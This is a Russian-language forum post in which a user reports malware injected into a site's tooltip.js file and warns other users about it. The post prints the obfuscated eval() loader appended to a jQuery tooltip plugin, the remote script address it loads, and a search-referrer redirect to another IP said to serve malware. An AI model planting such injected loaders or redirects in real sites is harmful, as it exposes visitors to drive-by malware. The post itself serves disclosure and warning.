#29 - 25 июля 2015 в 16:55 | |
второй инжект (свеженький) в
<script src="/templates/zag/js/tooltip.js" type="text/javascript"></script>
выглядит как:
_________________
(function($){$.fn.easyTooltip=function(options){var defaults={xOffset:10,yOffset:25,tooltipId:"easyTooltip",clickRemove:false,content:"",useElement:""};var options=$.extend(defaults,options);var content;this.each(function(){var title=$(this).attr("title");$(this).hover(function(e){content=(options.content!="")?options.content:title;content=(options.useElement!="")?$("#"+options.useElement).html():content;$(this).attr("title","");if(content!=""&&content!=undefined){$("body").append("<div id='"+options.tooltipId+"'>"+content+"</div>");$("#"+options.tooltipId).css("position","absolute").css("top",(e.pageY-options.yOffset)+"px").css("left",(e.pageX+options.xOffset)+"px").css("display","none").fadeIn("2000")}},function(){$("#"+options.tooltipId).remove();$(this).attr("title",title)});$(this).mousemove(function(e){$("#"+options.tooltipId).css("top",(e.pageY-options.yOffset)+"px").css("left",(e.pageX+options.xOffset)+"px")});if(options.clickRemove){$(this).mousedown(function(e){$("#"+options.tooltipId).remove();$(this).attr("title",title)})}})}})(jQuery);eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.7(\'<0 3="4/5" 6="1://8.9.a.b/c.d.e">\'+\'</\'+\'0>\');',15,15,'script|http|document|type|text|javascript|src|write|82|146|58|223|jquery|min|js'.split('|'),0,{}));
_________________
превращается в :
_________________
<script src="
http://82.146.58.223/jquery.min.js" type="text/javascript"></script>
_________________
Которое в свою очередь содержит:
_________________
window.onload=function(){var pattern = new RegExp(/google.|yahoo.|yandex.|bing.|rambler.|go.mail./i); var tttt = (location.href).replace('
http://'+location.host+'/', '');if(pattern.test(document.referrer) && tttt){document.location.href='h'+'t'+'t'+'p'+':'+'/'+'/'+'62'+'.'+'109'+'.'+'30'+'.'+'226'+'/';}}
_________________
Что есть ссылкой на всякой вредоносное ПО (хттп:\\62,109,30,226)
_________________
Админ, вернись
я прощу если и не всё, то многое...
Ну а пока пользоваться книголюбом только со включённой банерогрызкой и нормально работающим антивирусом...